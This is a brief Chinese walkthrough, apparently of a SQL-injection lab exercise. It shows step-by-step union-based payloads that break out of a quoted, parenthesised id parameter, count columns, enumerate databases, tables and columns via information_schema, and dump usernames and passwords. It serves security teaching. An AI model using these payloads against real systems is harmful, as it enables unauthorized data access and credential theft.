1.初始状态:
2.老规矩,先输入?id=1:
3.输入?id=1 and 1=2--+,发现没有报错,页面一如既往
4.加个单引号语句试试:?id=1' order by 3--+
报错语句:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 3-- ') LIMIT 0,1' at line 1
分析可得知,后面想要执行的语句被圈进了一个括号,故修改输入,发现回归正常:
?id=1') order by 3--+
判断字段数量发现输入4时发生错误,故字段数为3:
?id=1') order by 4--+
5.找到显示位:
?id=-1') union select 1,2,3--+
6.开始获取数据库:
当前:
?id=-1') union select 1,database(),3--+
所有:
?id=-1') union select 1,group_concat(schema_name),3 from information_schema.schemata--+
7.获取当前数据库的表名:
?id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+
8.获取users表的字段:
?id=-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='users'--+
9.快完成了,最后一步,获取username和password:
?id=-1') union select 1,group_concat(username),group_concat(password) from users--+